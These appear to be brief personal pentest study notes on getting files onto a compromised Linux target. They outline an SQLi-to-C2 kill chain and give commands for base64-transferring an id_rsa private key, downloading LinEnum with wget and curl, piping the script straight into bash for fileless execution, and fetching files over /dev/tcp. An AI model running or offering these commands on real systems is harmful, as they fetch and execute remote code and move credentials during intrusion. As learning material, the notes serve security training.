web server had a sqli> bash script execution> malware download> connect to c2 server> download other malwares with curl > wget > python on http

Download on target

cat id_rsa | base64 -w 0 ; echo # encode

copy and paste on target

echo -n “encoding” | base64 -d > id_rsa

with wget curl

wget <https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh> -O /tmp/LinEnum.sh

curl -o /tmp/LinEnum.sh <https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh>

file less attack with linux

can replicate file less operation with pipe |

some tool like mkfifo write file to disk . even if execution is fileless . temp files may be there in os

ex- curl LinEnum.sh | bash

or .py | python3

Download with bash (/dev/tcp)

if bash> 2 exists with —enable-net-redirections) >> can use built in /dev/tcp file for simple file downloads

connect to a server> then get a file> print a response

exec 3 <>/dev/tcp/$ip/80
echo -e "GET /LinEnum.sh HTTP/1.1\\n\\n">&3
cat <&3